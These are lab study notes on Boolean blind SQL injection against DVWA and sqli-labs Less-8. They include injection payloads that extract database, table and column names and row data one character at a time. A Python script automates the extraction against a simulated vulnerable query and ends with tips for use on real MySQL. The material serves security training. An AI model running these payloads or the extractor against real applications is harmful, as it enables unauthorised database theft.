Boolean blind: construct an SQL condition whose truth value changes the page, e.g. 1' and length(database())>=5 # determines whether the database name is at least 5 characters long
1' and substr(database(),1,1)='z'# tests the first character of the database name
1' and substr(database(),2,1)='z'# tests the second character
1' and ord(substr(database(),3,1))=119# tests the ASCII code of the third character (119 is 'w')
Query a table name: 1' and substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1)='u'#
Workflow: confirm the Boolean blind injection -> determine the length of the database name -> extract the database name -> extract the table names -> extract the column names
(The injection point itself is detected the same way as for union injection)
--------------------------------------------------------------------------------------------------
Less-8 (Boolean blind)
1. Determine whether there is an injection point
Executing ?id=1 gives the normal echo; ?id=1' gives no echo at all, so an injection point exists. Executing ?id=1'--+ restores the normal echo, so the parameter is wrapped in single quotes: ''
2. Determine the type of blind injection
The page only shows whether the query returned a row ("You are in...") and prints neither query results nor error messages, so union and error-based injection are out and the content has to be extracted one true/false condition at a time: Boolean blind
3. Determine the length of the database name
Execute ?id=1' and length(database())>=8--+ and adjust the number until the comparison flips; the database name turns out to be 8 characters long
4. Extract the database name
Execute ?id=1' and substr(database(),1,1)='s'--+ to test the first character
Execute ?id=1' and substr(database(),2,1)='e'--+ to test the second character
Continue one character at a time in the same way; the database name is security
5. Extract the table names
Execute ?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6--+ to determine the length of the first table name in the database
Execute ?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+ to determine the first letter of the first table name in the database
Advancing the limit offset (limit 1,1, limit 2,1, ...) walks through the remaining table names the same way
Continue one character at a time until all table names under security have been extracted: emails, referers, uagents, users
6. Extract the column names (from emails)
The length can be extracted first in the same way; it is not written out here
Execute ?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i'--+ to determine the first letter of the first column name of the emails table
Continue one character at a time until all column names of emails have been extracted: id, email_id
7. Extract the data (the id column)
Execute ?id=1' and substr((select id from emails limit 0,1),1,1)=1--+
This tests the first character of the id column in the first row
Continue one by one until all data in emails has been extracted
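The whole Less-8 procedure above (steps 1 to 7), and the DVWA probes at the top of the page, automated as an added example; this is not part of the original notes and not the lab's own code. The target is a constructed in-memory SQLite stand-in for the lab's SELECT * FROM users WHERE id='$id' LIMIT 0,1 query (an assumption: the real lab runs MySQL, so database() and ord() are emulated here, and only the --+ comment form is used because # is MySQL-only). Instead of guessing each character with an equality test, it binary-searches ord(substr(...)) between 0 and 127, which is why the ASCII-code form of the probe is the one worth automating.

```python
import sqlite3
from urllib.parse import unquote_plus


def build_target():
    """Constructed stand-in for the Less-8 'security' database (assumption: not the real lab).

    SQLite is used so the example runs offline; the MySQL pieces the payloads rely on
    (database(), ord(), information_schema.tables/columns, LIMIT k,1) are emulated.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS information_schema")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        CREATE TABLE emails(id INTEGER, email_id TEXT);
        INSERT INTO emails VALUES (1, 'Dumb@dhakkan.com');
        CREATE TABLE information_schema.tables(table_schema TEXT, table_name TEXT);
        INSERT INTO information_schema.tables VALUES
            ('security', 'emails'), ('security', 'referers'),
            ('security', 'uagents'), ('security', 'users');
        CREATE TABLE information_schema.columns(table_schema TEXT, table_name TEXT, column_name TEXT);
        INSERT INTO information_schema.columns VALUES
            ('security', 'emails', 'id'), ('security', 'emails', 'email_id');
    """)
    conn.create_function("database", 0, lambda: "security")
    conn.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def vulnerable_page(conn, raw_id):
    """The injectable query in the shape of Less-8: SELECT * FROM users WHERE id='$id' LIMIT 0,1.

    Like the lab page it shows nothing on an error or an empty result, and the
    fixed text 'You are in...' when a row comes back: a one-bit oracle.
    """
    id_value = unquote_plus(raw_id)  # the web server turns the '+' of '--+' into a space
    sql = f"SELECT * FROM users WHERE id='{id_value}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ""
    return "You are in..........." if row else ""


def make_oracle(conn):
    """Wrap the page as ask(condition) -> bool, sending ?id=1' and <condition>--+ each time."""
    def ask(condition):
        ask.requests += 1
        return "You are in" in vulnerable_page(conn, f"1' and {condition}--+")
    ask.requests = 0
    return ask


def find_int(ask, expr, hi):
    """Binary-search the integer value of a SQL expression in [0, hi]: about log2(hi) requests."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{expr}<={mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract_string(ask, expr, max_len=64):
    """Recover the text value of a SQL expression: its length first, then each character via ord()."""
    length = find_int(ask, f"length({expr})", max_len)
    return "".join(chr(find_int(ask, f"ord(substr({expr},{i},1))", 127))
                   for i in range(1, length + 1))


def extract_rows(ask, column, from_clause, max_rows=32):
    """Walk a result set with LIMIT k,1 until the scalar subquery returns NULL."""
    rows = []
    for k in range(max_rows):
        sub = f"(select {column} from {from_clause} limit {k},1)"
        if not ask(f"length({sub})>0"):  # length(NULL)>0 is not true: there is no row k
            break
        rows.append(extract_string(ask, sub))
    return rows


def dump_database(conn):
    """Steps 3 to 7 of the page: database name, table names, the columns of emails, its data."""
    ask = make_oracle(conn)
    db = extract_string(ask, "database()")
    tables = extract_rows(ask, "table_name",
                          f"information_schema.tables where table_schema='{db}'")
    columns = extract_rows(ask, "column_name",
                           f"information_schema.columns where table_schema='{db}' and table_name='emails'")
    data = extract_rows(ask, "email_id", "emails")
    return db, tables, columns, data, ask.requests


if __name__ == "__main__":
    target = build_target()
    # step 1: the page goes silent on 1' and comes back with 1'--+
    print(repr(vulnerable_page(target, "1'")), repr(vulnerable_page(target, "1'--+")))
    print(dump_database(target))
```

Each character costs about 7 requests this way instead of up to 95 equality guesses. Two caveats when pointing this at real MySQL: with the default _ci collations a probe like substr(database(),1,1)='S' is also true for 's', so compare with ord() (or binary) as this script does when case matters; and length(NULL) is NULL in MySQL exactly as emulated here, which is what makes the "no more rows" check in extract_rows safe.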
-------------------------------------------------------END----------------------------------------------------------------